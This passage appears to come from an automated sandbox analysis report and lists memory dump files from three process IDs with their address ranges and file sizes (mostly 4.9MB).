    • memory/3892-27-0x0000000000E10000-0x00000000012FE000-memory.dmp

      Filesize

      4.9MB

    • memory/3892-23-0x0000000000E10000-0x00000000012FE000-memory.dmp

      Filesize

      4.9MB

    • memory/3892-22-0x0000000000E10000-0x00000000012FE000-memory.dmp

      Filesize

      4.9MB

    • memory/3892-34-0x0000000000E10000-0x00000000012FE000-memory.dmp

      Filesize

      4.9MB

    • memory/3892-21-0x0000000000E10000-0x00000000012FE000-memory.dmp

      Filesize

      4.9MB

    • memory/3892-20-0x0000000000E11000-0x0000000000E79000-memory.dmp

      Filesize

      416KB

    • memory/3892-19-0x0000000000E10000-0x00000000012FE000-memory.dmp

      Filesize

      4.9MB

    • memory/5456-4194-0x0000000000E10000-0x00000000012FE000-memory.dmp

      Filesize

      4.9MB

    • memory/6128-2852-0x0000000000E10000-0x00000000012FE000-memory.dmp

      Filesize

      4.9MB

    • memory/6128-2854-0x0000000000E10000-0x00000000012FE000-memory.dmp

      Filesize

      4.9MB